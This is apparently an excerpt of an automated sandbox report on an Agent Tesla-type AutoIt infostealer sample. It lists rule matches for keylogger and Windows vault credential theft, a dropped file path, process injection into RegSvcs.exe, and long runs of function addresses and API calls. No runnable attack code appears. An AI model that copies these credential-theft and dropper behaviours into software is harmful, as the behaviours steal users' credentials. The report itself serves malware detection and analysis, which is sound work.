                Source: 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                Source: 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: This is a third-party compiled AutoIt script.0_2_00983D19
                Source: RHOqJ5BrHW.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: RHOqJ5BrHW.exe, 00000000.00000000.2040085321.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e212fbdb-a
                Source: RHOqJ5BrHW.exe, 00000000.00000000.2040085321.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_9838d702-f
                Source: RHOqJ5BrHW.exe, 00000000.00000003.2048929871.00000000030BD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_49020a0b-0
                Source: RHOqJ5BrHW.exe, 00000000.00000003.2048929871.00000000030BD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d5828f2f-6
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: This is a third-party compiled AutoIt script.2_2_00423D19
                Source: unjuridically.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: unjuridically.exe, 00000002.00000002.2066346733.00000000004CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_651c0cca-8
                Source: unjuridically.exe, 00000002.00000002.2066346733.00000000004CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: ESDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_3403fd85-5
                Source: unjuridically.exe, 00000005.00000000.2180196592.00000000004CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_56a5a7c7-d
                Source: unjuridically.exe, 00000005.00000000.2180196592.00000000004CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: ESDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_e59f2ef1-a
                Source: RHOqJ5BrHW.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6bb84482-e
                Source: RHOqJ5BrHW.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d10e30a0-d
                Source: unjuridically.exe.0.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6d2cdac5-4
                Source: unjuridically.exe.0.drString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_b1169155-c
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_00983742 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,0_2_00983742
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009F00AF NtdllDialogWndProc_W,0_2_009F00AF
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009F0133 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,0_2_009F0133
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009F044C NtdllDialogWndProc_W,0_2_009F044C
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009EE9AF NtdllDialogWndProc_W,CallWindowProcW,0_2_009EE9AF
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_0099AAFC NtdllDialogWndProc_W,0_2_0099AAFC
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_0099AB4F NtdllDialogWndProc_W,0_2_0099AB4F
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009EECD4 6F58C580,6F58C6F0,ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,0_2_009EECD4
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009EEC7C NtdllDialogWndProc_W,0_2_009EEC7C
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009EEEEB PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_009EEEEB
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009EF1D7 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_009EF1D7
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_0099B11F NtdllDialogWndProc_W,745AC8D0,NtdllDialogWndProc_W,0_2_0099B11F
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009EF2D0 SendMessageW,NtdllDialogWndProc_W,0_2_009EF2D0
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_0099B385 GetParent,NtdllDialogWndProc_W,0_2_0099B385
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009EF351 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_009EF351
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009EF5AB NtdllDialogWndProc_W,0_2_009EF5AB
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009EF5DA NtdllDialogWndProc_W,0_2_009EF5DA
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_0099B55D NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,0_2_0099B55D
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009EF689 ClientToScreen,6F58C5D0,NtdllDialogWndProc_W,0_2_009EF689
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009EF609 NtdllDialogWndProc_W,0_2_009EF609
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009EF654 NtdllDialogWndProc_W,0_2_009EF654
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009EF7C3 GetWindowLongW,NtdllDialogWndProc_W,0_2_009EF7C3
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009EF7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,6F58CB00,6F58C2F0,SetCapture,ClientToScreen,6F58C530,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_009EF7FF
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_0099B715 NtdllDialogWndProc_W,0_2_0099B715
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00423742 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,2_2_00423742
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_004900AF NtdllDialogWndProc_W,2_2_004900AF
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00490133 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,2_2_00490133
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0049044C NtdllDialogWndProc_W,2_2_0049044C
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0048E9AF NtdllDialogWndProc_W,CallWindowProcW,2_2_0048E9AF
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0043AAFC NtdllDialogWndProc_W,2_2_0043AAFC
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0043AB4F NtdllDialogWndProc_W,2_2_0043AB4F
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0048EC7C NtdllDialogWndProc_W,2_2_0048EC7C
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0048ECD4 6F58C580,6F58C6F0,ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,2_2_0048ECD4
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0048EEEB PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,2_2_0048EEEB
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0043B11F NtdllDialogWndProc_W,745AC8D0,NtdllDialogWndProc_W,2_2_0043B11F
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0048F1D7 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,2_2_0048F1D7
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0048F2D0 SendMessageW,NtdllDialogWndProc_W,2_2_0048F2D0
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0048F351 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,2_2_0048F351
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0043B385 GetParent,NtdllDialogWndProc_W,2_2_0043B385
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0043B55D NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,2_2_0043B55D
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0048F5DA NtdllDialogWndProc_W,2_2_0048F5DA
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0048F5AB NtdllDialogWndProc_W,2_2_0048F5AB
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0048F654 NtdllDialogWndProc_W,2_2_0048F654
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0048F609 NtdllDialogWndProc_W,2_2_0048F609
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0048F689 ClientToScreen,6F58C5D0,NtdllDialogWndProc_W,2_2_0048F689
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0043B715 NtdllDialogWndProc_W,2_2_0043B715
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0048F7C3 GetWindowLongW,NtdllDialogWndProc_W,2_2_0048F7C3
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0048F7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,6F58CB00,6F58C2F0,SetCapture,ClientToScreen,6F58C530,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_0048F7FF
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009C6685: CreateFileW,DeviceIoControl,CloseHandle,0_2_009C6685
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009BACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74745590,74747ED0,CreateProcessAsUserW,74745030,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,74747F30,0_2_009BACC5
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009C79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_009C79D3
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_004679D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_004679D3
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009AB0430_2_009AB043
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009B410F0_2_009B410F
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009A02A40_2_009A02A4
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009B038E0_2_009B038E
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_0098E3B00_2_0098E3B0
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009A06D90_2_009A06D9
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009B467F0_2_009B467F
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009EAACE0_2_009EAACE
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009B4BEF0_2_009B4BEF
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009ACCC10_2_009ACCC1
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_00986F070_2_00986F07
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_0098AF500_2_0098AF50
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009E31BC0_2_009E31BC
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009AD1B90_2_009AD1B9
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_0099B11F0_2_0099B11F
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009932000_2_00993200
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009A123A0_2_009A123A
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009B724D0_2_009B724D
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009C13CA0_2_009C13CA
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009893F00_2_009893F0
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_0099F5630_2_0099F563
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009CB6CC0_2_009CB6CC
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009896C00_2_009896C0
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009877B00_2_009877B0
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009EF7FF0_2_009EF7FF
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009B79C90_2_009B79C9
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_0099FA570_2_0099FA57
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_00993B700_2_00993B70
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_00989B600_2_00989B60
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_00987D190_2_00987D19
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009A9ED00_2_009A9ED0
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_0099FE6F0_2_0099FE6F
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_00987FA30_2_00987FA3
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_00CAB4780_2_00CAB478
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0044B0432_2_0044B043
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00433B702_2_00433B70
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0045410F2_2_0045410F
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_004402A42_2_004402A4
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0042E3E32_2_0042E3E3
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0045038E2_2_0045038E
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0045467F2_2_0045467F
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_004406D92_2_004406D9
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0048AACE2_2_0048AACE
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00454BEF2_2_00454BEF
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0044CCC12_2_0044CCC1
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0042AF502_2_0042AF50
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00426F072_2_00426F07
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0043B11F2_2_0043B11F
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_004831BC2_2_004831BC
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0044D1B92_2_0044D1B9
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0045724D2_2_0045724D
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_004332002_2_00433200
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0044123A2_2_0044123A
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_004613CA2_2_004613CA
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_004293F02_2_004293F0
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0043F5632_2_0043F563
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_004296C02_2_004296C0
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0046B6CC2_2_0046B6CC
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0048F7FF2_2_0048F7FF
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_004277B02_2_004277B0
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_004579C92_2_004579C9
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0043FA572_2_0043FA57
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00429B602_2_00429B60
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00427D192_2_00427D19
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0043FE6F2_2_0043FE6F
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00449ED02_2_00449ED0
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00427FA32_2_00427FA3
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00CAFFF82_2_00CAFFF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00DCB48A3_2_00DCB48A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00DC4A883_2_00DC4A88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00DCAD983_2_00DCAD98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00DC3E703_2_00DC3E70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00DC41B83_2_00DC41B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062A7E503_2_062A7E50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062A66C03_2_062A66C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062A24403_2_062A2440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062A52703_2_062A5270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062AC2703_2_062AC270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062AB3183_2_062AB318
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062A77703_2_062A7770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062AE4783_2_062AE478
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062A00403_2_062A0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062A59C03_2_062A59C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_062A001F3_2_062A001F
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 5_2_016D63885_2_016D6388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_02E941B86_2_02E941B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_02E94A886_2_02E94A88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_02E93E706_2_02E93E70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_02E9ECD86_2_02E9ECD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_02E9AD986_2_02E9AD98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_067DC3806_2_067DC380
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_067DAAE86_2_067DAAE8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_068566C06_2_068566C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_068556706_2_06855670
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0685C2706_2_0685C270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0685B30B6_2_0685B30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_068531386_2_06853138
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_06857E506_2_06857E50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_068577706_2_06857770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0685E4786_2_0685E478
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_068500406_2_06850040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_06855DAB6_2_06855DAB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0685003C6_2_0685003C
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: String function: 0043EC2F appears 68 times
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: String function: 00446AC0 appears 42 times
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: String function: 0044F8A0 appears 35 times
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: String function: 009AF8A0 appears 35 times
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: String function: 0099EC2F appears 68 times
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: String function: 009A6AC0 appears 42 times
